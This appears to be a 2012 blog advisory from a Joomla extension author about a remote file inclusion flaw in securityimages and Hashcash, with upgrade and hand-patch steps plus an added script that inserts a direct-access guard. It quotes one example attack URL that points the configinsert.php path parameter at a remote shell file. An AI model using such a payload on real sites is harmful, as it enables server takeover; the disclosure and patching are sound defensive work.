Saturday, February 04, 2012


Security risk in securityimages


The webmaster of janwiersma.com sent me an email today at 6:12AM: his server was hacked because of a bug in securityimages. This bug allows a remote attacker to force your server to include and execute a remote file (remote file inclusion), and it affects ALL versions of securityimages <= 3.0.5.

Here are the files that put your server at risk: client.php, configinsert.php, lang.php, server.php

Example of attack (from http://securityreason.com/exploitalert/892):
http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
Secunia also has a report on it: http://secunia.com/product/11186/

In fact, I forgot to use this line in these files:
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
It stops any request that reaches the file directly instead of through Joomla!, which is the only place where _VALID_MOS is defined.

- upgrade to 3.0.6 (download at Joomla Forge or in my download section), OR
- patch the faulty files by hand: add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each of the four files listed above

Please also contact all your friends who are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is available!

- upgrade to 1.2.2 (download at Joomla Forge or in my download section), OR
- patch the faulty files by hand: add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each affected file
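For the "patch by hand" option above (both for securityimages and for Hashcash), here is an added helper script that is not part of the original post or of either extension. It inserts the _VALID_MOS guard right after the opening <?php tag rather than at byte 0 of the file (text placed before <?php would simply be echoed to the browser), skips files that already carry the guard, and keeps a .bak copy. The component directory and the file names are passed as arguments; the four securityimages file names are the ones listed above, the Hashcash file names are not given in the post.

```shell
#!/bin/sh
# Added example: insert the Joomla! 1.0 direct-access guard into component files.
# Assumes the opening <?php tag line does not itself open a multi-line comment.

GUARD="defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');"

# patch_file FILE -> prints "patched", "already-guarded" or "no-php-tag"
patch_file() {
    f="$1"
    if grep -q "_VALID_MOS" "$f"; then
        echo "already-guarded"
        return 0
    fi
    if ! grep -q '<?php' "$f"; then
        echo "no-php-tag"
        return 1
    fi
    # Print every line; right after the first line holding the opening tag,
    # emit the guard. The original file is kept as FILE.bak.
    awk -v guard="$GUARD" '{print} !done && /<\?php/ {print guard; done=1}' "$f" > "$f.tmp" \
        && mv "$f" "$f.bak" && mv "$f.tmp" "$f"
    echo "patched"
}

# patch_files DIR FILE... -> one status line per file
patch_files() {
    dir="$1"; shift
    for name in "$@"; do
        if [ ! -f "$dir/$name" ]; then
            echo "$name: missing"
            continue
        fi
        printf '%s: ' "$name"
        patch_file "$dir/$name" || true
    done
}

# usage (hypothetical path): 
# patch_files components/com_securityimages client.php configinsert.php lang.php server.php
```

Running the script a second time is safe: already patched files are reported as "already-guarded" and left untouched.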

JoomlaCloud is NOT affected

YOU ARE ALL URGED TO UPGRADE ASAP!

